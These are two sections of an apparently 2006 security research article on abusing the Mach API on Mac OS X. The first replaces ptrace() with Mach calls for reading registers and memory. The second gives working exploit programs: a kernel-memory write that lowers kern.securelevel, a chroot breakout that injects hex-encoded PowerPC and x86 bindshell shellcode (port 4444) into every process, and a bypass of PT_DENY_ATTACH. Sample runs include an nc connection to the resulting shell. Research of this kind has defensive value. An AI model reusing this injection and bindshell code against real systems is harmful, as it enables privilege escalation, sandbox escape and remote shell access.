http://uninformed.org/index.cgi?v=4&a=3&p=14

Replacing ptrace()

A lot of people seem to move to Mac OS X from a Linux or BSD background and therefore expect the ptrace() syscall to be useful. However, unfortunately, this isn't the case on Mac OSX. For some ungodly reason, Apple decided to leave ptrace() incomplete and unable to do much more than take a feeble attempt at an anti-debug mechanism or single step the process.

As it turns out, the anti-debug mechanism (PT_DENY_ATTACH) only stops future ptrace() calls from attaching to the process. Since ptrace() functionality is highly limited on Mac OS X anyway, and task_for_pid() is unrestricted, this basically has no purpose.

In this section I will run through the missing features from a real implementation of ptrace and show you how to implement them on Mac OS X.

The first and most useful thing we'll look at is how to get a port for a task. Assuming you have sufficient privileges to do so, you can call the task_for_pid() function providing a unix process id and you will receive a port for that task.

This function is pretty straightforward to use and works as you'd expect.

	pid_t 	pid;
	task_t	port;

	task_for_pid(mach_task_self(), pid, &port);

After this call, if sufficient privileges were held, a port will be returned in ``port''. This can then be used with later API function calls in order to manipulate the target tasks resources. This is pretty similar conceptually to the ptrace() PTRACE_ATTACH functionality.

One of the most noticeable changes to ptrace() on Mac OS X is the fact that it is no longer possible to retrieve register state as you would expect. Typically, the ptrace() commands PTRACE_GETREGS and PTRACE_GETFPREGS would be used to get register contents. Fortunately this can be achieved quite easily using the Mach API.

The task_threads() function can be used with a port in order to get a list of the threads in the task.

	thread_act_port_array_t thread_list;
	mach_msg_type_number_t thread_count;

	task_threads(port, &thread_list, &thread_count);

Once you have a list of threads, you can then loop over them and retrieve register contents from each. This can be done using the thread_get_state() function.

The code below shows the process involved for retrieving the register contents from a thread (in this case the first thread) of a thread_act_port_array_t list.

NOTE:
	This code will only work on ppc machines, i396_thread_state_t type is 
	used for intel.


	ppc_thread_state_t ppc_state;
	mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT;
	long thread = 0;	// for first thread

	thread_get_state(
			  thread_list[thread],
			  PPC_THREAD_STATE,
			  (thread_state_t)&ppc_state,
			  &sc
	);

For PPC machines, you can then print out the registered contents for a desired register as so:

	printf(" lr: 0x%x\n",ppc_state.lr);

Now that register contents can be retrieved, we'll look at changing them and updating the thread to use our new contents.

This is similar to the ptrace PTRACE_SETREGS and PTRACE_SETFPREGS requests on Linux. We can use the mach call thread_set_state to do this. I have written some code to put these concepts together into a tiny sample program.

The following small assembly code will continue to loop until the r3 register is nonzero.

	.globl _main
	_main:

		li      r3,0
	up:
		cmpwi   cr7,r3,0
		beq-    cr7,up
		trap

The C code below attaches to the process and modifies the value of the r3 register to 0xdeadbeef.

/*
 * This sample code retrieves the old value of the
 * r3 register and sets it to 0xdeadbeef.
 *
 * - nemo
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <mach/mach_types.h>
#include <mach/ppc/thread_status.h>

void error(char *msg)
{
        printf("[!] error: %s.\n",msg);
        exit(1);
}

int main(int ac, char **av)
{
        ppc_thread_state_t ppc_state;
        mach_msg_type_number_t sc = PPC_THREAD_STATE_COUNT;
        long thread = 0;        // for first thread
        thread_act_port_array_t thread_list;
        mach_msg_type_number_t thread_count;
        task_t  port;
        pid_t   pid;

        if(ac != 2) {
                printf("usage: %s <pid>\n",av[0]);
                exit(1);
        }

        pid = atoi(av[1]);

        if(task_for_pid(mach_task_self(), pid, &port))
                error("cannot get port");

        // better shut down the task while we do this.
        if(task_suspend(port)) error("suspending the task");

        if(task_threads(port, &thread_list, &thread_count))
                error("cannot get list of tasks");


        if(thread_get_state(
                          thread_list[thread],
                          PPC_THREAD_STATE,
                          (thread_state_t)&ppc_state,
                          &sc
        )) error("getting state from thread");

        printf("old r3: 0x%x\n",ppc_state.r3);

        ppc_state.r3 = 0xdeadbeef;

        if(thread_set_state(
                          thread_list[thread],
                          PPC_THREAD_STATE,
                          (thread_state_t)&ppc_state,
                          sc
        )) error("setting state");

        if(task_resume(port)) error("cannot resume the task");

        return 0;
}

A sample run of these two programs is as follows:

	-[nemo@gir:~/code]$ ./tst&
	[1] 5302
	-[nemo@gir:~/code]$ gcc chgr3.c -o chgr3
	-[nemo@gir:~/code]$ ./chgr3 5302
	old r3: 0x0
	-[nemo@gir:~/code]$
	[1]+  Trace/BPT trap          ./tst

As you can see, when the C code is run, ./tst has it's r3 register modified and the loop exits, hitting the trap.

Some other features which have been removed from the ptrace() call on Mac OS X are the ability to read and write memory. Again, we can achieve this functionality using Mach API calls. The functions vm_write() and vm_read() (as expected) can be used to write and read the address space of a target task.

These calls work pretty much how you would expect. However there are examples throughout the rest of this paper which use these functions. The functions are defined as follows:

kern_return_t   vm_read
                (vm_task_t                          target_task,
                 vm_address_t                           address,
                 vm_size_t                                 size,
                 size                                  data_out,
                 target_task                         data_count);


kern_return_t   vm_write
                (vm_task_t                          target_task,
                 vm_address_t                           address,
                 pointer_t                                 data,
                 mach_msg_type_number_t              data_count);

These functions provide similar functionality to the ptrace requests: PTRACE_POKETEXT, PTRACE_POKEDATA and PTRACE_POKEUSR.

The memory being read/written must have the appropriate protection in order for these functions to work correctly. However, it is quite easy to set the protection attributes for the memory before the read or write takes place. To do this, the vm_protect() API call can be used.

kern_return_t   vm_protect
                 (vm_task_t           target_task,
                  vm_address_t            address,
                  vm_size_t                  size,
                  boolean_t           set_maximum,
                  vm_prot_t        new_protection);

The ptrace() syscall on Linux also provides a way to step a process up to the point where a syscall is executed. The PTRACE_SYSCALL request is used for this. This functionality is useful for applications such as "strace" to be able to keep track of system calls made by an application. Unfortunately, this feature does not exist on Mac OS X. The Mach api provides a very useful function which would provide this functionality.

kern_return_t   task_set_emulation
                (task_t                                    task,
                 vm_address_t                  routine_entry_pt,
                 int                             syscall_number);

This function would allow you to set up a userspace handler for a syscall and log it's execution. However, this function has not been implemented on Mac OS X. 


===================


http://uninformed.org/index.cgi?v=4&a=3&p=17

 	

Next: Conclusion Up: Abusing Mach on Mac Previous: Moving into the kernel   Contents

Security considerations of a UNIX / Mach hybrid

Many problems arise when both UNIX and Mach aspects are provided on the same system. As the quote from the Apple Security page [2] says (mentioned in the introduction). A good Mach programmer will be able to bypass high level BSD security functionality by using the Mach API/Mach Traps on Mac OS X.

In this section I will run through a couple of examples of situations where BSD security can be bypassed. There are many more cases like this. I'll leave it up to you (the reader) to find more.

The first bypass which we will look at is the "kern.securelevel" sysctl. This sysctl is used to restrict various functionality from the root user. When this sysctl is set to -1, the restrictions are non-existent. Under normal circumstances the root user should be able to raise the securelevel however lowering the securelevel should be restricted.

Here is a demonstration of this:

	-[root@fry:~]$ id
	uid=0(root) gid=0(wheel) 

	-[root@fry:~]$ sysctl -a | grep securelevel
	kern.securelevel = 1

	-[root@fry:~]$ sysctl -w kern.securelevel=-1
	kern.securelevel: Operation not permitted

	-[root@fry:~]$ sysctl -w kern.securelevel=2
	kern.securelevel: 1 -> 2

	-[root@fry:~]$ sysctl -w kern.securelevel=1
	kern.securelevel: Operation not permitted

As you can see, modification of this sysctl works as described above. However! Due to the fact that we can task_for_pid() pid=0 and write to kernel memory, we can bypass this.

In order to do this, we simply get the address of the variable in kernel- space which stores the securelevel. To do this we can use the `nm' tool.

	-[root@fry:~]$ nm /mach_kernel | grep securelevel
	004bcf00 S _securelevel

We can then use this value by calling task_for_pid() to get the kernel task port, and calling vm_write() to write to this address. The code below does this.

Here is an example of this code being used.

	-[root@fry:~]$ sysctl -a | grep securelevel
	kern.securelevel = 1

	-[root@fry:~]$ ./slevel -1
	[+] done!

	-[root@fry:~]$ sysctl -a | grep securelevel
	kern.securelevel = -1

A kext could also be used for this. But this is neater and relevant.

/*
 * [ slevel.c ]
 * nemo@felinemenace.org 
 * 2006
 *
 * Tools to set the securelevel on
 * Mac OSX Build 8I1119 (10.4.6 intel).
 */


#include <mach/mach.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>

// -[nemo@fry:~]$ nm /mach_kernel | grep securelevel
// 004bcf00 S _securelevel
#define  SECURELEVELADDR 0x004bcf00

void error(char *msg)
{
        printf("[!] error: %s\n",msg);
        exit(1);
}

void usage(char *progname)
{
        printf("[+] usage: %s <value>\n",progname);
        exit(1);
}

int main(int ac, char **av)
{
        mach_port_t    kernel_task;
        kern_return_t  err;
        long           value = 0;

        if(ac != 2)
                usage(*av);

        if(getuid() && geteuid())
                error("requires root.");

        value = atoi(av[1]);

        err = task_for_pid(mach_task_self(),0,&kernel_task);
        if ((err != KERN_SUCCESS) || !MACH_PORT_VALID(kernel_task))
                error("getting kernel task.");

        // Write values to stack.
        if(vm_write(kernel_task, (vm_address_t) SECURELEVELADDR, (vm_address_t)&value, sizeof(value)))
                error("writing argument to dlopen.");

        printf("[+] done!\n");
        return 0;
}

The chroot() call is a UNIX mechanism which is often (mis)used for security purposes. This can also be bypassed using the Mach API/functionality. A process running on Mac OSX within a chroot() is able to attach to any process outside using the task_for_pid() Mach trap. Although neither of these problems are significant, they are an indication of some of the ways that UNIX functionality can be bypassed using the Mach API.

The code below simply loops through all pids from 1 upwards and attempts to inject a small code stub into a new thread. It is written for PowerPC architecture. I have also included some shellcode for intel arch in case anyone has the need to use it in these circumstances.

/*
 * sample code to break chroot() on osx
 * - nemo
 *
 * This code is a PoC and by so, is pretty harsh
 * I just trap in any process which isn't desirable.
 * DO NOT RUN ON A PRODUCTION BOX (or if you do, email 
 * me the results so I can laugh at you)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <mach/mach.h>
#include <mach/ppc/thread_status.h>
#include <mach/i386/thread_state.h>
#include <dlfcn.h>

#define STACK_SIZE 0x6000
#define MAXPID	  0x6000 

char ppc_probe[] =
// stat code
"\x38\x00\x00\xbc\x7c\x24\x0b\x78\x38\x84\xff\x9c\x7c\xc6\x32"
"\x79\x40\x82\xff\xf1\x7c\x68\x02\xa6\x38\x63\x00\x18\x90\xc3"
"\x00\x0c\x44\x00\x00\x02\x7f\xe0\x00\x08\x48\x00\x00\x14"
"/mach_kernelAAAA"
// bindshell from metasploit. Port 4444
"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38"
"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02"
"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80"
"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44"
"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02"
"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82"
"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c"
"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00"
"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0"
"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00";

unsigned char x86_probe[] =  
// stat code, cheq for /mach_kernel. Makes sure we're outside 
// the chroot.
"\x31\xc0\x50\x68\x72\x6e\x65\x6c\x68\x68\x5f\x6b\x65\x68\x2f"
"\x6d\x61\x63\x89\xe3\x53\x53\xb0\xbc\x68\x7f\x00\x00\x00\xcd"
"\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80\x90\x90\x90\x90\x90"
// bindshell - 89 bytes - port 4444  
// based off metasploit freebsd code.
"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c"
"\x89\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53"
"\x52\x6a\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e"
"\xcd\x80\x97\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49"
"\x0f\x89\xf1\xff\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x54\x54\x53\x53\xb0\x3b\xcd\x80";

int injectppc(pid_t pid,char *sc,unsigned int size)
{
        kern_return_t ret;
        mach_port_t mytask;
        vm_address_t stack;
        ppc_thread_state_t ppc_state;
        thread_act_t thread;
        long blr = 0x7fe00008;

        if ((ret = task_for_pid(mach_task_self(), pid, &mytask)))
		return -1;

        // Allocate room for stack and shellcode.
        if(vm_allocate(mytask, &stack, STACK_SIZE, TRUE) != KERN_SUCCESS)
		return -1;

	// Write in our shellcode
        if(vm_write(mytask, (vm_address_t)((stack + 650)&~2), (vm_address_t)sc, size))
		return -1;

        if(vm_write(mytask, (vm_address_t) stack + 960, (vm_address_t)&blr, sizeof(blr)))
		return -1;
	
	// Just in case.
 	if(vm_protect(mytask,(vm_address_t) stack, STACK_SIZE, 
VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE,VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE))
		return -1;


        memset(&ppc_state,0,sizeof(ppc_state));
        ppc_state.srr0  = ((stack + 650)&~2);
        ppc_state.r1    = stack + STACK_SIZE - 100;
        ppc_state.lr    = stack + 960;          // terrible blr cpu usage but this 
						// whole code is a hack so shutup!.

        if(thread_create_running(mytask, PPC_THREAD_STATE,
          (thread_state_t)&ppc_state, PPC_THREAD_STATE_COUNT, &thread)
        != KERN_SUCCESS)
		return -1;

        return 0;
}

int main(int ac, char **av)
{
	pid_t pid;
	// (pid = 0) == kernel
	printf("[+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).\n");
	for(pid = 1; pid <= MAXPID ; pid++) 
		injectppc(pid,ppc_probe,sizeof(ppc_probe));

	return 0;
}

The output below shows a sample run of this code on a stock standard Mac OSX 10.4.6 Mac mini. As you can see, a non privilege user within the chroot() is able to attach to a process running at the same privilege level outside of the chroot(). Some shellcode can then be injected into the process to bind a shell.

	-[nemo@gir:~/code]$ gcc break.c -o break
	-[nemo@gir:~/code]$ cp break chroot/
	-[nemo@gir:~/code]$ sudo chroot chroot/
	-[root@gir:/]$ ./dropprivs

An interesting note about this little ./dropprivs program is that I had to use seteuid()/setuid() separately rather than using the setreuid() function. It appears setreuid() and setregid() don't actually work at all. Andrewg summed this situation up nicely:

<andrewg> best backdoor ever

	-[nemo@gir:/]$ ./break 
	[+] Breaking chroot() check for a non-chroot()ed shell on port 4444 (TCP).
	-[nemo@gir:/]$ Illegal instruction
	-[root@gir:/]$ nc localhost 4444
	ls -lsa /mach_kernel
	8472 -rw-r--r--   1 root  wheel  4334508 Mar 27 14:27 /mach_kernel
	id;
	uid=501(nemo) gid=501(nemo) groups=501(nemo)

Another method of breaking out from a chroot() environment would be to simply task_for_pid() pid 0 and write into kernel memory. However since this would require root privileges I didn't bother to implement it. This code could quite easily be implemented as shellcode. However, due to time constraints and lack of caring, I'll leave it up to you to do so.

ptrace

As I mentioned in the ptrace section of this paper, the ptrace() syscall has been heavily bastardized and is pretty useless now. However, a new ptrace command PT_DENY_ATTACH has been implemented to enable a process to request that other processes will not be able to ptrace attach to it.

The following sample code shows the use of this:

	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/ptrace.h>

	static int changeme =  0;

	int main(int ac, char **av)
	{

		ptrace(PT_DENY_ATTACH, 0, 0, 0);

		while(1) {
			if(changeme) {
				printf("[+] hacked.\n");
				exit(1);
			}
		}

		return 1;       
	}

This code does nothing but sit and spin while checking the status of a global variable which is never changed. As you can see below, if we try to attach to this process in gdb (which uses ptrace) our process will receive a SIGSEGV.

	(gdb) at hackme.25143 
	A program is being debugged already.  Kill it? (y or n) y
	Attaching to program: `/Users/nemo/hackme', process 25143.
	Segmentation fault

However we can use the Mach API, as mentioned earlier, and still attach to the process just fine. We can use the `nm' command in order to get the address of the static changeme variable.

	-[nemo@fry:~]$ nm hackme | grep changeme
	0000202c b _changeme

Then, using the following code, we task_for_pid() the process and modify the contents of this variable (as an example.)

	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <sys/types.h>
	#include <sys/mman.h>
	#include <mach/mach.h>
	#include <dlfcn.h>

	#define CHANGEMEADDR 0x202c

	void error(char *msg)
	{
		printf("[!] error: %s\n",msg);
		exit(1);
	}

	int main(int ac, char **av)
	{
		mach_port_t port;
		long    content = 1;

		if(ac != 2) {
			printf("[+] usage: %s <pid>\n",av[0]);
			exit(1);
		}

		if(task_for_pid(mach_task_self(), atoi(av[1]), &port))
			error("_|_");

		if(vm_write(port, (vm_address_t) CHANGEMEADDR, (vm_address_t)&content, sizeof(content)))
			error("writing to process");

		return 0;
	}

As you can see below, this will result in the loop terminating as expected.

	-[nemo@fry:~]$ ./hackme
	[+] hacked.
	-[nemo@fry:~]$

